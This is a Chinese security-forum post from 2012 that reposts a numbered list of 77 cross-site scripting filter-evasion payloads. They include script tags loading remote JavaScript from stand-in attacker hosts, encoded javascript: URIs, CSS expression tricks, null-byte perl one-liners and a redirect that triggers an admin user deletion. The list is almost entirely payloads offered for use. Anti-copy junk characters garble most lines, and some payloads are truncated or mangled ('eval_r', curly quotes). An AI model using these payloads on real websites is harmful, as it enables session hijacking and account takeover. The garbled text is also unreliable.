貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
, Y' |% B4 \- H
5 \/ Q% ~& k5 P3 Q (1)普通的XSS JavaScript注入: H# h% j% P Z3 d6 x: r2 S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% ^' ]0 r4 d1 |- T% }; q7 ^+ ~+ `% f- [' C
(2)IMG标签XSS使用JavaScript命令
3 M1 V. r1 w+ {2 X* s <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
}; }1 G- | ]
! |9 v' C/ M$ V4 D h: |5 A (3)IMG标签无分号无引号
O1 N* P: @ I/ \0 |8 d5 M, N4 L; I <IMG SRC=javascript:alert(‘XSS’)>
! \/ @; p1 w' b) w/ e! H* c1 p% Q/ a1 d+ I) K
(4)IMG标签大小写不敏感3 {, c9 c# d: w: l" D: c
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- l1 i* E% c I% g
, o b. t% z- N$ F5 b$ Y (5)HTML编码(必须有分号)+ l8 b- o3 q* W, b* N# h4 k
<IMG SRC=javascript:alert(“XSS”)>; ~$ A& d9 p, E
: w2 `( A9 A8 O& L3 Y! d" u- I
(6)修正缺陷IMG标签4 b8 `7 V) d; r: I8 B; q* r9 U* |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! I5 F, E0 h) z& v4 j6 ]" Y9 S; }2 `% S
(7)formCharCode标签(计算器)
( D& K) p2 N% O2 f! W4 x' m6 V <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8 Q4 p; p+ N% Y# N) Q- @1 b( `
5 R* Z' @' |( t' J# R5 O (8)UTF-8的Unicode编码(计算器)8 f/ e: b% I* u, b) b- K: F
<IMG SRC=jav..省略..S')>1 a3 D* K$ S8 x$ l# R
2 \& j2 ]1 A7 L+ n9 ~ (9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 `9 e% q0 l0 P! X
<IMG SRC=jav..省略..S')>
4 T2 V, l t: K; ]; J) |: m
# n' D( `/ C6 `+ I" k (10)十六进制编码也是没有分号(计算器)$ h# c, W# e; \- T+ R
<IMG SRC=java..省略..XSS')>
7 Q! @- p4 i5 m8 R9 b4 u
0 S! ]4 e8 {# e* ?) |! X (11)嵌入式标签,将Javascript分开% i p; ]( o/ C% g6 o& K
<IMG SRC=”jav ascript:alert(‘XSS’);”>3 P: J! \* X- X3 R
v: P8 n4 K& G- u (12)嵌入式编码标签,将Javascript分开
1 A1 g3 W/ d8 C$ O* u5 T% Z& p5 K; c; O <IMG SRC=”jav ascript:alert(‘XSS’);”>9 F" [4 R6 G$ f# v, \4 Z# ]8 n5 A
7 v4 {3 h* G, h8 x3 }9 S
(13)嵌入式换行符1 d3 H8 {. W3 y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 |, j# z0 g0 z$ T/ Z/ W. M' S( ]" K5 ~4 O
(14)嵌入式回车
+ i; m& \, W: K <IMG SRC=”jav ascript:alert(‘XSS’);”>: u+ L E; Z' o6 x2 p- Y
; l1 B" J8 P. Q (15)嵌入式多行注入JavaScript,这是XSS极端的例子' B% Q/ e! U" G7 v! M/ { n
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 T& x( l7 Z: j) l' ~0 o' o
3 v8 ]/ s# H4 @, @$ v (16)解决限制字符(要求同页面)# Q' Y9 J5 b" r% G7 O
<script>z=’document.’</script>" w' C* \$ T) M# B+ a
<script>z=z+’write(“‘</script>8 T! m# S4 T2 ]% }, [; O7 b
<script>z=z+’<script’</script>
$ I4 \. A+ [" F$ O# d% v <script>z=z+’ src=ht’</script>
* J! w9 h. |6 H5 ]' d8 }( w <script>z=z+’tp://ww’</script>2 R+ f: [0 @( Z1 H7 v
<script>z=z+’w.shell’</script>4 I; @' d7 A" I) Q* Y/ u
<script>z=z+’.net/1.’</script>
. r0 H+ z) T" Q: L <script>z=z+’js></sc’</script>$ i4 k& F* a7 p9 F; k/ r- |
<script>z=z+’ript>”)’</script>
" g4 a+ O* c7 u k3 S <script>eval_r(z)</script>
/ s4 Q, {1 r: ^, t" B
+ d) H0 H7 G# h) W v6 P (17)空字符. e$ d& d7 a% M3 P; Z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
* g6 X: k T- ^6 z: d1 u
% |( R# I* v$ O4 j, a (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
8 b* @( m. ^& |1 n4 ]8 R perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
: o' n9 k1 x2 a3 Z3 B( j/ n& t
! p. v! T0 H$ H: o (19)Spaces和meta前的IMG标签5 h6 J. r' Y4 _; H/ `# [
<IMG SRC=” � javascript:alert(‘XSS’);”>
6 U+ D2 j+ e* m& C: }
. k( Z% s: e3 K (20)Non-alpha-non-digit XSS
- C' T/ b# F+ j5 W' m$ Q* U! u <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ b# k D) m2 ]# ]3 q {* U
7 W! e8 L% C3 l* G1 \* G6 f (21)Non-alpha-non-digit XSS to 22 n5 `* T+ F4 d# e3 P! `. @
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>1 \# ^2 k% @9 A5 T N
" f+ ?5 W4 p3 Z" [
(22)Non-alpha-non-digit XSS to 3
% W/ E4 i; c1 u! o <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> } z4 F+ e% f
4 \) k! l4 {. n4 c5 k# L- O (23)双开括号
1 j; c- u: \8 q2 E" e& l <<SCRIPT>alert(“XSS”);//<</SCRIPT>+ w0 F }( E7 n
. I' n# Q @/ T- s L (24)无结束脚本标记(仅火狐等浏览器)
8 @6 v* @) N# Z! m0 l T <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
0 ^. x$ D u) {
, D/ i) V: f/ [6 Z( X (25)无结束脚本标记24 T% m$ h6 P4 H* j/ h7 [9 `
<SCRIPT SRC=//3w.org/XSS/xss.js>
- n8 ^" `; n% x& m
9 ^/ e8 Y& X( T, p8 ~) L; ` (26)半开的HTML/JavaScript XSS
! J1 S6 e; P# x3 [! u8 v9 x <IMG SRC=”javascript:alert(‘XSS’)”
- p9 R5 x9 s& v I+ @( d
% t' _9 c1 u' u! \/ R/ T7 K (27)双开角括号
' M- n6 V! L; G8 _8 J3 M <iframe src=http://3w.org/XSS.html < w6 f$ q( Z4 v
( u: J( h, X) E
(28)无单引号 双引号 分号
7 `- u6 r3 y5 [0 L <SCRIPT>a=/XSS/
+ I. F% b: q: H4 o) m alert(a.source)</SCRIPT>9 }0 v) m2 W' R0 g) v$ m
, o! U' |# l; t1 [! a4 j' d4 E* e+ O (29)换码过滤的JavaScript
, s% V( k" A2 T. i& q% C/ A( f \”;alert(‘XSS’);//
5 {7 C' S0 F% B" B- [" H
- @1 V& t( d( Z2 b: ]% p (30)结束Title标签 t9 F/ u- o, c
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
, d( C3 ~ J8 O4 s
- u& N0 c1 ? a c3 g% p$ [ n' ] (31)Input Image
9 P; g$ S- M9 @& @' G6 H9 D4 E <INPUT SRC=”javascript:alert(‘XSS’);”># v8 | U9 W- f' r9 A# x3 X
N, }3 D6 }7 h0 m2 L. v$ q) P+ `
(32)BODY Image; q5 @8 A4 b0 \. }8 y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>- J# Q5 r% y3 F! g, l6 ~
/ W9 R. b4 U( n: G (33)BODY标签
( \( i, V. T$ k3 \ <BODY(‘XSS’)>
4 `+ n5 U: k$ c6 P$ w
5 ]7 _9 o( [3 a9 p+ m (34)IMG Dynsrc. n9 d# ^7 w5 }
<IMG DYNSRC=”javascript:alert(‘XSS’)”>! L/ ]3 g" t# T- y' |
+ f2 m" D0 k) s: [: u* ^ (35)IMG Lowsrc$ o7 h! F5 |6 i- v
<IMG LOWSRC=”javascript:alert(‘XSS’)”>1 c; F/ O D) A
. H, _8 ~2 ]; [! n
(36)BGSOUND9 S, o5 Z4 o# l
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. u7 z- X: K1 S: P
( T' N h3 K7 s (37)STYLE sheet, Y% [. g1 z7 q9 c l f: s
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>! ]7 R+ X1 h9 F7 A$ h
/ p h$ f7 B! V) ^) \
(38)远程样式表6 Q0 B' K P; H( Z4 B+ u3 P/ |
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>. G* z+ m0 K. D* v( n' s4 N
4 c2 I: K! j) e2 M9 d (39)List-style-image(列表式)- C) i, S2 V5 l, ?- m; N
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- r5 ^- A) n- \! \* o2 k6 Q
5 _) z! I- p, \7 _7 L1 O' g (40)IMG VBscript9 D6 i3 W1 p* F3 n: B. V2 V4 K( C5 Z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
* L2 C! m! C; W5 W5 s3 o: ]- @
(41)META链接url
T- X2 R5 u& S( s <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>% D) p6 c( R' q3 y" {9 O# ~
* t" q" o6 C5 u; ^; P7 J. I (42)Iframe
: \5 }4 S/ X+ n& k! \, v) G <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 A' I1 F- L9 d$ J ^
! g" |. X+ z2 G! Z/ l (43)Frame5 M3 _8 v' J2 L, ~7 k0 c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
) @: u: e7 P( ?/ y7 }) i7 e
( e6 |, | i. d (44)Table
6 U9 p9 U1 g9 [. z+ D) Y/ a) g# b* e <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ Z! R. z/ v5 S8 S
) ~) o3 I( z+ P+ P# T& `# f (45)TD, N* A9 E" k' R* l% X/ X |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>& B6 m( f6 C2 d5 Y+ f* D4 ?
% e* V" P% N' M, G4 F
(46)DIV background-image
1 m' y1 V9 f4 e+ S9 y7 F <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>& O, @1 U2 {8 |! R" X
- J( B9 \1 p8 J- I- y: T6 C
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)! y; }7 ^3 f# [
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
9 l% e7 v& I0 t: q% W! v3 X4 Q7 k# P+ G, i* }' d" S
(48)DIV expression) N9 I( x8 [. ?3 U1 V
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>9 u" _# O- x3 C4 y
. ~% q. E8 S3 ]6 ~+ |& u0 j
(49)STYLE属性分拆表达
/ O/ c7 \, z. B! `+ a& R8 k7 \ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>) m8 W: [" F* k+ |: v1 d
& Q4 ~; q/ ~) l9 v2 h
(50)匿名STYLE(组成:开角号和一个字母开头)8 _: p* C. F7 d/ N, I
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>* V: @8 {3 M1 u$ S) |
2 f7 ?# T/ V" a z+ T
(51)STYLE background-image
) }4 R! R3 C* v1 S <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>7 h6 o' L2 ]* L& `8 {
" K/ u0 h* U9 y (52)IMG STYLE方式# e, I4 ~* M! R0 y+ c
exppression(alert(“XSS”))’>
/ Z, v, ~! }3 K1 I/ Y7 a
3 E$ s/ g9 w: Q4 y Y; R (53)STYLE background8 y% J2 \& \2 _9 ?5 X
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
# P7 g/ }, J W, _+ E
) `; [- {- n1 D, C/ U$ c2 M (54)BASE
/ a! O6 d8 ` \ Z' X: o <BASE HREF=”javascript:alert(‘XSS’);//”>
( B6 E# l# L. l1 N- t! s0 F' F$ ?$ A) t t% `. ~0 S, {
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; p' X9 ~; E. R& c' q( O
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 @! L8 R8 u) j1 N* O! S
4 N4 G* T" c2 n) _9 K+ p (56)在flash中使用ActionScrpt可以混进你XSS的代码4 |8 K1 d$ ], w" ^( T# p2 J
a=”get”;/ q6 y |- r0 O9 v- u; g2 ~% v
b=”URL(\”";
# i( X D; m+ b3 k5 x) N. } c=”javascript:”;
& [4 p0 _! X6 v: Z6 X/ y/ X! x d=”alert(‘XSS’);\”)”;8 d$ q/ e& t2 y! w) O
eval_r(a+b+c+d);5 N8 `1 s% V& W$ c2 f, ~' h4 X
h8 S9 _1 c8 X" m# D" i: s0 N
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' Y0 U: m7 R# ~3 n9 c <HTML xmlns:xss>+ f# u# k a& _& V5 l
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>* O$ v* w" Z6 E% g( t4 [
<xss:xss>XSS</xss:xss>
8 `; ? X. m( I3 {( s </HTML>" d x) i0 N7 e0 L, g O# ^
( ^! l" ^- z3 s7 @; d
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用. ^ S& @( x* c. f8 E
<SCRIPT SRC=””></SCRIPT>
- Z4 L/ \2 {6 T% P
! N% T6 e' v( W+ S, B (59)IMG嵌入式命令,可执行任意命令
$ w, I( R$ h) W/ _ v$ b <IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ S0 J9 ~: Y! r% `( N' @( F( \
# }# e# l }" c (60)IMG嵌入式命令(a.jpg在同服务器)
/ h% y! _* _4 B0 t Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 a* z7 X' B" {3 f, l* m2 h) \. d. ], X$ Y5 F8 m, f* E4 G
(61)绕符号过滤
! U0 A9 q# p4 l4 P3 P6 s9 e' E <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- Y$ M$ a9 O* }5 f0 h* N
" B6 [, [2 y! b" k (62)
% m5 i, a l5 {$ e <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>4 c6 e) }5 |' S9 J6 Q" h4 B
3 x, b4 z5 C! y+ s I3 b) Z (63)
; T% K+ _: C; ]' | <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
7 B, R) h3 [2 M: I9 W; ]% M8 ^9 _% c9 @& v; ]* Z
(64)
4 t* }* r* x1 u0 o. U <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>0 Q: ~: Q2 `7 H6 v4 K8 r5 H
. `. m/ q- x' F! S& t2 S# t4 n (65)
5 e8 [( {5 B* F) T& E! R7 B$ l <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>: w* I9 k- l! h( _5 E- H( n
1 c. }1 c" {- D- y0 _" l# B1 \
(66)4 b' [" p* X! T* u- S
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>9 Y' b! Q4 B0 N, i0 U0 P9 w
1 ^* c# k1 A5 @" X$ P' J
(67)
2 H4 U% K( O$ k. X; \! }: j <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>$ [6 e, e! N. ]$ U$ y0 _' O
2 |1 o" i+ p& _! z% ~; f2 Y! m/ |
(68)URL绕行# `6 _- {3 x$ \ ]2 B
<A HREF=”http://127.0.0.1/”>XSS</A>4 z( Z* I' h. A; z: i( h
' @1 A9 T) W# r. `+ |( o/ Q (69)URL编码7 n* c+ ]2 `& ~
<A HREF=”http://3w.org”>XSS</A> ]) [+ Z& V( h J
. R; h$ z, | P0 f
(70)IP十进制
1 L6 F; z& f$ D( L <A HREF=”http://3232235521″>XSS</A>
! t% R Q3 }! D2 g* `
4 h- s7 {0 S. \, v5 D (71)IP十六进制
5 A; c0 r( E& C6 [2 p9 k <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% e9 O7 [8 L8 K7 a
- }% \: l% a. b9 ` (72)IP八进制
1 G0 ~, I0 w( N+ w4 |" y- H9 N <A HREF=”http://0300.0250.0000.0001″>XSS</A>. U) ~$ t* Q% F, w S
& g A& i/ F, ]4 Q! K (73)混合编码5 c/ f: ^5 E5 B+ o0 u+ a# ?
<A HREF=”h1 Y4 p' V! h, w! |( w
tt p://6 6.000146.0×7.147/”">XSS</A>
$ s2 T' x( o. s5 f" u& x
7 Z( m; \; X8 H0 D4 K" y (74)节省[http:]' a. E9 L) W5 z$ F
<A HREF=”//www.google.com/”>XSS</A>
6 S! c' T& q8 c) @! Q- E# j- Z5 C" N9 {8 |' t
(75)节省[www]( C/ F$ k$ K6 i/ h1 g
<A HREF=”http://google.com/”>XSS</A>+ y( z. {2 J( o8 f
9 ?( p8 W* k& E (76)绝对点绝对DNS
3 @( Y& `& r, o5 v- G' K6 V <A HREF=”http://www.google.com./”>XSS</A>
2 T# x1 `6 O9 c1 B9 j/ y4 n) p. n' z; L1 o3 O5 k
(77)javascript链接
. z( e8 f* C3 v. }) C <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
分享
支持
反对